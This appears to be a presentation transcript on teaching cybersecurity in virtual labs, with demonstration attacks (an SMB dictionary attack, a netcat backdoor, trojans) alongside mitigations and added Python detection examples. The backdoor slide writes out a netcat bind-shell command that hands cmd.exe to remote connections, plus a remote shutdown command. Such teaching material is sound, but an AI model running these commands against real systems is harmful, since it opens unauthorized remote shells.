Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.


Areas to be covered
- Brief introduction to virtualization
- General Benefits of virtualization
- Dominant vendors and common products
- Lab Architecture
- Lab technical support
- Lab Exercise Demonstration
- Summary
- Questions

Introduction to Virtualization
- A software entity can have and share access to underlying hardware resources.
- The software entity can be an application, a network or a virtual machine.
- Humans can interact with it as if it is a separate entity (e.g. a separate physical machine).
- A software layer exists that allows for the creation and deployment of virtual machines.

General Benefits
- Multiple guest operating systems can exist on one physical machine
- More productivity and less cost
- Additional energy and real estate cost savings
- Software testing before deployment (patches)
- Fast restore in the event of VM crash or corruption

Dominant Vendors and Common Products
- VMware
  – vSphere, ESXi, vCloud Director
- Citrix (Xen)
  – Xen is open source
  – Citrix version has an excellent management interface
  – Alternative choice to the VMware product line
- Linux Kernel Virtual Machine
  – High potential but no well-developed management interface

Common Products for Single Users
- Enterprise class virtualization products – VMware, Citrix Xen and Linux KVM – can:
  – Create multiple virtual networks
  – Allow numerous connections to the servers
  – Allow the clustering of servers and provide a good management interface
  – Provide a way to authenticate users
- Common products for single users
  – VMware Workstation, VMware Player etc.
  – Oracle VirtualBox
  – Virtual PC

Lab Architecture
- Consists of multiple physical servers
- Group of servers is managed by a central server
- Central server should have ability to connect into an authentication server
- VPN might be needed for security
- Choice between web based connection to VM or IP based remote connection (RDP or SSH)

Lab Architecture Diagram 95a.html

Extra Notes on Lab Architecture
- The number of physical servers should depend on the number of students and the storage you need
- Cost increases with each additional server you add
- Consider the technical support required for the system

Lab Support
- Lab may require additional technical support from IT staff
- Both instructors and students may need help with connectivity
- Students may require help with lab exercises
- Consider having IT staff help with this area
- Consider hiring teaching assistants or lab assistants to help with lab exercises

Potential Technical Issues
- VPN Connectivity
  – Installed Firewall on client PCs
  – Installed Internet Security (Antivirus) software on client PCs
- User Based Issues
  – Inexperienced users
  – Incorrectly applied instructions

Attacks
- Online password attack (Windows)
  – Attempt to crack a password on a remote system
  – Victim will be a Windows system
- Backdoor attack
  – Insider-installed malicious program that allows connections to be made to victim system
- Trojan attack
  – Malicious program that appears harmless but performs some other action

Online Password Attack (Windows)
- Server Message Block used for file sharing
- SMB clients and servers communicate about shared resources
nd_Protocols.html

Online Password Attack (Contd.)
- Attacker's Objective
  – Retrieve or discover a privileged user's password
- Attack Method
  – Automate a dictionary password attack against a Windows share
  – A custom script can and will be used
- Mitigation/Prevention/Detection
  – Apply maximum logon attempts
  – Security personnel should review log files

Online Password Attack Contd. (Demo)
- Nmap scan of network
- Enumerate shares of the Windows machines
- Run script that attempts to connect to share with a privileged account
- Connection attempt will use multiple dictionary passwords
- Connect to the VM using a terminal application

Online Password Attack on Windows (Contd.)
- Learning Objectives
  – Importance of using a complex password
  – Importance of enforcing maximum logon attempts
  – Importance of renaming the administrator account
  – Understanding the effectiveness of social engineering
- Knowing the username is half the battle
- Aha moment!
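The log review named under Mitigation/Prevention/Detection can be partly automated. The sketch below is an added example, not part of the original presentation: it scans constructed records modelled on Windows Security events 4625 (failed logon) and 4624 (successful logon) with logon type 3 (network), and flags a burst of failures for one account from one source, plus a success that follows such a burst. The record layout, threshold and window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not real logs): time, event ID, account, source IP, logon type.
# 4625 = failed logon, 4624 = successful logon; logon type 3 = network (e.g. share access).
SAMPLE = """\
2024-05-01T10:00:01 4625 Administrator 10.0.0.50 3
2024-05-01T10:00:02 4625 Administrator 10.0.0.50 3
2024-05-01T10:00:03 4625 Administrator 10.0.0.50 3
2024-05-01T10:00:04 4625 Administrator 10.0.0.50 3
2024-05-01T10:00:05 4625 Administrator 10.0.0.50 3
2024-05-01T10:00:06 4624 Administrator 10.0.0.50 3
2024-05-01T10:05:00 4625 alice 10.0.0.21 3
2024-05-01T11:30:00 4625 alice 10.0.0.21 3
2024-05-01T11:31:00 4624 alice 10.0.0.21 3
"""

def parse(text):
    """Yield (timestamp, event_id, account, source, logon_type) per record."""
    for line in text.splitlines():
        ts, event_id, account, source, logon_type = line.split()
        yield datetime.fromisoformat(ts), int(event_id), account, source, int(logon_type)

def detect(text, threshold=5, window=timedelta(minutes=1)):
    """Return alerts for bursts of failed network logons and a success after one."""
    failures = defaultdict(deque)   # (source, account) -> timestamps of recent failures
    flagged = set()                 # pairs that already crossed the threshold
    alerts = []
    for ts, event_id, account, source, logon_type in parse(text):
        if logon_type != 3:
            continue                # only network logons are of interest here
        key = (source, account)
        recent = failures[key]
        while recent and ts - recent[0] > window:
            recent.popleft()        # drop failures that fell out of the window
        if event_id == 4625:
            recent.append(ts)
            if len(recent) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("burst", source, account, ts.isoformat()))
        elif event_id == 4624 and key in flagged and recent:
            # A success right after a burst suggests the password was found.
            alerts.append(("success_after_burst", source, account, ts.isoformat()))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The two widely spaced failures for the account alice stay below the threshold, which is the ordinary mistyped-password case an account lockout policy is meant to tolerate.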

Backdoor Attack
- Attacker's objective
  – Execute remote commands on victim system
- Attack Method
  – Insider installs backdoor program on a victim machine
  – Backdoor listens for and accepts incoming connections

Backdoor Attack Contd.
- Mitigation/Prevention/Detection
  – Physical security reduces the risk
  – Anti-virus scans are also effective

Backdoor Attack Steps
- Install backdoor (netcat) on victim computer
- Configure backdoor to accept incoming connections
  – Execute "nc -l -v -p 5555 -e cmd.exe" on server or victim
- Connect to the victim machine
  – Execute "nc -vn 5555"
- Execute command on remote system from attack machine
  – Execute "shutdown -r -t 20" to shut down and restart the victim system in 20 seconds
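On the detection side, a backdoor like the one in this lab leaves two visible traces on the victim: a listening port that is not part of the machine's baseline, and a command shell whose parent is the listening process. The following is an added example, not part of the original presentation: it audits constructed `netstat -ano` style output against an assumed allowlist and a constructed process inventory (PID, parent PID, image name).

```python
# Constructed sample data (not from a real host).
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       3120
  TCP    10.0.0.7:5555          10.0.0.50:49812        ESTABLISHED     3120
"""
# Constructed process inventory: pid, parent pid, image name.
PROCESSES = """\
4 0 System
892 612 svchost.exe
2044 1980 explorer.exe
3120 2044 nc.exe
3188 3120 cmd.exe
"""
ALLOWED_LISTENERS = {135: "svchost.exe", 445: "System"}  # assumed lab baseline
SHELLS = {"cmd.exe", "powershell.exe"}

def listeners(netstat_text):
    """Map each listening TCP port to the PID that owns it."""
    found = {}
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            found[port] = int(parts[4])
    return found

def audit(netstat_text, process_text):
    """Flag listeners outside the baseline and shells spawned by a listening process."""
    procs = {}
    for line in process_text.splitlines():
        pid, ppid, image = line.split()
        procs[int(pid)] = (int(ppid), image)
    findings = []
    listening = listeners(netstat_text)
    for port, pid in sorted(listening.items()):
        image = procs.get(pid, (0, "unknown"))[1]
        if ALLOWED_LISTENERS.get(port) != image:
            findings.append(("unexpected_listener", port, image))
    owners = set(listening.values())
    for pid, (ppid, image) in sorted(procs.items()):
        if image.lower() in SHELLS and ppid in owners:
            parent = procs.get(ppid, (0, "unknown"))[1]
            findings.append(("shell_child_of_listener", pid, parent))
    return findings

if __name__ == "__main__":
    for finding in audit(NETSTAT, PROCESSES):
        print(finding)
```

Matching on the port-to-image pair rather than the port alone also catches a renamed binary listening on an otherwise expected port.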

Trojan Attack
- Attacker's Objective
  – Successfully install or execute malware on a victim system
  – Trojan installs malware but pretends to be legitimate software

Trojan Attack (Contd.)
- Attack Method
  – Malicious web downloads
  – Attachments
- Mitigation/Prevention/Detection
  – Up to date anti-virus definitions
  – User training

Take Home Message
- Virtualization is useful for hands-on exercises.
- Provides flexibility to create different lab environments
- Cost is proportional to the number of students using the lab
- Lab support is useful and should be considered
- Virtual labs help instructors to achieve learning objectives and improve experiential learning.

Questions
- Any questions?